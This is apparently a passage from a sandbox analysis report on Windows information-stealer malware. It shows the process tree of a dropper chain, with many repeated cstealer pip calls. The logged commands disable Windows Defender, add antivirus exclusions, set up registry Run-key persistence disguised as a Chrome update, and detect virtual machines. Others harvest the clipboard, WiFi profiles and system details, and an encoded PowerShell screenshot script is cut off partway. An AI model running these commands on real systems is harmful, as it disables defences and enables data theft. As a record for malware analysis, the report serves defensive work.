        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        495⤵
        
        PID:15924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        496⤵
        
        PID:17672
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        497⤵
        
        PID:17904
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        498⤵
        
        PID:7924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        499⤵
        
        PID:5064
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        500⤵
        
        PID:16080
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        501⤵
        
        PID:18052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        502⤵
        
        PID:18372
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        503⤵
        
        PID:17628
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        504⤵
        
        PID:12172
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        505⤵
        
        PID:9584
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        506⤵
        
        PID:6540
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        507⤵
        
        PID:13520
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        508⤵
        
        PID:16124
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        509⤵
        
        PID:10256
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        510⤵
        
        PID:17920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        511⤵
        
        PID:2332
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        512⤵
        
        PID:18196
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        513⤵
        
        PID:10512
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        514⤵
        
        PID:15620
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        515⤵
        
        PID:13860
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        516⤵
        
        PID:10204
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        517⤵
        
        PID:10484
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        518⤵
        
        PID:4392
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        519⤵
        
        PID:18804
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        520⤵
        
        PID:18852
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        521⤵
        
        PID:18908
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        522⤵
        
        PID:19096
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        523⤵
        
        PID:19244
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        524⤵
        
        PID:19292
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        525⤵
        
        PID:19416
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        526⤵
        
        PID:10460
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        527⤵
        
        PID:18464
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        528⤵
        
        PID:18656
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        529⤵
        
        PID:18700
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        530⤵
        
        PID:18748
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        531⤵
        
        PID:11648
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        532⤵
        
        PID:19004
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        533⤵
        
        PID:19056
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        534⤵
        
        PID:19184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        535⤵
        
        PID:19208
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        536⤵
        
        PID:19312
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        537⤵
        
        PID:18512
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        538⤵
        
        PID:18640
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        539⤵
        
        PID:16544
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        540⤵
        
        PID:19400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        541⤵
        
        PID:19448
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        542⤵
        
        PID:18528
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        543⤵
        
        PID:12856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        544⤵
        
        PID:16936
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        545⤵
        
        PID:18824
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        546⤵
        
        PID:19068
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        547⤵
        
        PID:19132
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        548⤵
        
        PID:12528
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        549⤵
        
        PID:18524
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        550⤵
        
        PID:9400
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        551⤵
        
        PID:14040
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        552⤵
        
        PID:19340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        553⤵
        
        PID:10300
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        554⤵
        
        PID:18544
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        555⤵
        
        PID:18648
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        556⤵
        
        PID:11620
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        557⤵
        
        PID:18796
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        558⤵
        
        PID:19000
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        559⤵
        
        PID:19012
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        560⤵
        
        PID:16748
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        561⤵
        
        PID:8440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        562⤵
        
        PID:17236
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        563⤵
        
        PID:9944
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        564⤵
        
        PID:12044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        565⤵
        
        PID:14868
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        566⤵
        
        PID:9248
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        567⤵
        
        PID:5544
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        568⤵
        
        PID:18564
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        569⤵
        
        PID:15064
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        570⤵
        
        PID:18996
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        571⤵
        
        PID:19440
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        572⤵
        
        PID:16596
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        573⤵
        
        PID:10380
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        574⤵
        
        PID:17060
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        575⤵
        
        PID:14068
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        576⤵
        
        PID:7904
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        577⤵
        
        PID:8748
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        578⤵
        
        PID:7572
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        579⤵
        
        PID:2072
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        580⤵
        
        PID:15340
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        581⤵
        
        PID:1504
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        582⤵
        
        PID:4508
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        583⤵
        
        PID:7388
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        584⤵
        
        PID:7272
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        585⤵
        
        PID:6104
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        586⤵
        
        PID:19528
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        587⤵
        
        PID:19584
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        588⤵
        
        PID:19716
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        589⤵
        
        PID:19892
- C:\Users\Admin\AppData\Local\Temp\main.exe
  "C:\Users\Admin\AppData\Local\Temp\main.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3512
- - C:\Users\Admin\AppData\Local\Temp\main.exe
    "C:\Users\Admin\AppData\Local\Temp\main.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2948
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI35122\Build.exe -pbeznogym
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4760
    - - C:\Users\Admin\AppData\Local\Temp\_MEI35122\Build.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI35122\Build.exe -pbeznogym
        5⤵
        Executes dropped EXE
        
        PID:4940
      - C:\ProgramData\Microsoft\hacn.exe
        
        "C:\ProgramData\Microsoft\hacn.exe"
        6⤵
        Executes dropped EXE
        
        PID:3308
        
        C:\ProgramData\Microsoft\hacn.exe
        
        "C:\ProgramData\Microsoft\hacn.exe"
        7⤵
        Executes dropped EXE
        
        PID:3620
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI33082\s.exe -pbeznogym
        8⤵
        
        PID:4552
        
        C:\Users\Admin\AppData\Local\Temp\_MEI33082\s.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI33082\s.exe -pbeznogym
        9⤵
        Executes dropped EXE
        
        PID:6204
        
        C:\ProgramData\main.exe
        
        "C:\ProgramData\main.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5828
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpD61C.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpD61C.tmp.bat
        11⤵
        
        PID:9180
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 5828"
        12⤵
        Enumerates processes with tasklist
        
        PID:8172
        
        C:\Windows\system32\find.exe
        
        find ":"
        12⤵
        
        PID:6280
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        12⤵
        Delays execution with timeout.exe
        
        PID:8068
        
        C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
        
        "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
        12⤵
        
        PID:7220
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        13⤵
        
        PID:7144
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        14⤵
        Modifies registry key
        
        PID:944
        
        C:\ProgramData\svchost.exe
        
        "C:\ProgramData\svchost.exe"
        10⤵
        Executes dropped EXE
        
        PID:4836
        
        C:\ProgramData\svchost.exe
        
        "C:\ProgramData\svchost.exe"
        11⤵
        
        PID:7456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:7544
        
        C:\ProgramData\setup.exe
        
        "C:\ProgramData\setup.exe"
        10⤵
        Executes dropped EXE
        
        PID:7284
      - C:\ProgramData\Microsoft\based.exe
        
        "C:\ProgramData\Microsoft\based.exe"
        6⤵
        Executes dropped EXE
        
        PID:1480
        
        C:\ProgramData\Microsoft\based.exe
        
        "C:\ProgramData\Microsoft\based.exe"
        7⤵
        Executes dropped EXE
        
        PID:3360
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
        8⤵
        
        PID:5868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5864
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        8⤵
        
        PID:5876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()""
        8⤵
        
        PID:5884
        
        C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()"
        9⤵
        
        PID:5708
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ ‏ .scr'"
        8⤵
        
        PID:5944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ ‏ .scr'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6160
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        
        PID:5248
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5936
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        
        PID:5492
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        8⤵
        
        PID:6188
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        8⤵
        
        PID:6236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:7056
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        
        PID:6284
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:7132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:6324
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:7116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        8⤵
        
        PID:6380
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        9⤵
        
        PID:6720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        8⤵
        
        PID:6452
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        9⤵
        Gathers system information
        
        PID:6448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0